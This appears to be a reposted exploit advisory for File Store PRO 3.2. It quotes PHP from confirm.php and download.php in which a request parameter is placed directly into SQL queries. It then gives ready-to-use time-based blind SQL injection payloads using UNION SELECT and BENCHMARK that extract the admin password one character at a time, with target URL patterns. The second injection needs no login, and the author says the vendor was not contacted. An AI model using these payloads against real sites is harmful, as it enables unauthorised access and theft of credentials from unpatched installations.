File Store PRO 3.2 Multiple Blind SQL Injection Vulnerabilities

| File Store PRO 3.2 Blind SQL Injection |

|________________________________________|

Download from: http://upoint.info/cgi/demo/fs/filestore.zip

– Need admin rights:

/confirm.php:复制代码代码如下:

if(isset($_GET[\”folder\”]) && $_GET[\”folder\”]!=\”\”) {

$folder=$_GET[\”folder\”];

} else {

exit(\”Bad Request\”);

}

if(isset($_GET[\”id\”]) && $_GET[\”id\”]!=\”\”) {

$id=$_GET[\”id\”];

} else {

exit(\”Bad Request\”);

}

// Validate all inputs

// Added by SepedaTua on June 01, 2006 – http://www.sepedatua.info/

/********************** SepedaTua ****************************/

/* Fields:

$folder

$id

*/

$search = array (\’@<script[^>]*?>.*?</script>@si\’,

\’@<[\\/\\!]*?[^<>]*?>@si\’,

\’@([\\r\\n])[\\s] @\’,

\’@&(quot|#34);@i\’,

\’@&(amp|#38);@i\’,

\’@&(lt|#60);@i\’,

\’@&(gt|#62);@i\’,

\’@&(nbsp|#160);@i\’,

\’@&(iexcl|#161);@i\’,

\’@&(cent|#162);@i\’,

\’@&(pound|#163);@i\’,

\’@&(copy|#169);@i\’,

\’@&#(\\d );@e\’);

$replace = array (\’\’,

\’\’,

\’\\1\’,

\’\”\’,

\’&\’,

\'<\’,

\’>\’,

\’ \’,

chr(161),

chr(162),

chr(163),

chr(169),

\’chr(\\1)\’);

$ffolder = $folder;

$fid = $id;

$folder = preg_replace($search, $replace, $folder);

$id = preg_replace($search, $replace, $id);

—–

$SQL=\”SELECT `\”.DB_PREFIX.\”users`.*, `\”.DB_PREFIX.\”file_list`.`filename`, `\”.DB_PREFIX.\”file_list`.`descript` \”;

$SQL.=\” FROM `\”.DB_PREFIX.\”file_list` LEFT JOIN `\”.DB_PREFIX.\”users` ON `\”.DB_PREFIX.\”file_list`.`user_id`=`\”.DB_PREFIX.\”users`.`id`\”;

$SQL.=\” WHERE `\”.DB_PREFIX.\”file_list`.`id`=\’\”.$id.\”\’\”;

if(!$mysql->query($SQL))

{

exit($mysql->error);

}

if($mysql->num<=0)

{

exit(\”Record not found\”);

}

POC:

\’ UNION SELECT IF (SUBSTRING(password, 1, 1)=\’a\’, BENCHMARK(100000000, ENCODE(\’a\’,\’b\’)), 1 ),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from fstore_users where login=\’admin

Site: http://site.xxx/confirm.php?folder=a&id=[SQL]

– Don\’t need admin rights:

In /download.php:复制代码代码如下:

if(!isset($_GET[\”sig\”])) // direct download, no need to login

$MustLogin=1|2|4;

require_once(\”libs/header.php\”);

if(!isset($_GET[\”sig\”])) // direct download, no need to login

$userlevel=$CurUser->getlevel();

$SQL=\”SELECT * FROM `\”.DB_PREFIX.\”file_list` WHERE `id`=\’\”.$fileid.\”\’\”;

if(!$mysql->query($SQL))

{

exit($mysql->error);

}

POC:

\’ UNION SELECT IF (SUBSTRING(password, 1, 1)=\’a\’, BENCHMARK(100000000, ENCODE(\’a\’,\’b\’)), 1 ),2,3,4,5,6,7,8,9,10,11 from fstore_users where login=\’admin

Site:

http://site.xxx/download.php?id=[SQL]

Needs magic_quotes_gpc=off. Vendor not contacted !

——————————————————————–

Site: http://rstcenter.com

Site: http://de-ce.net

Good luck !

——————————————————————–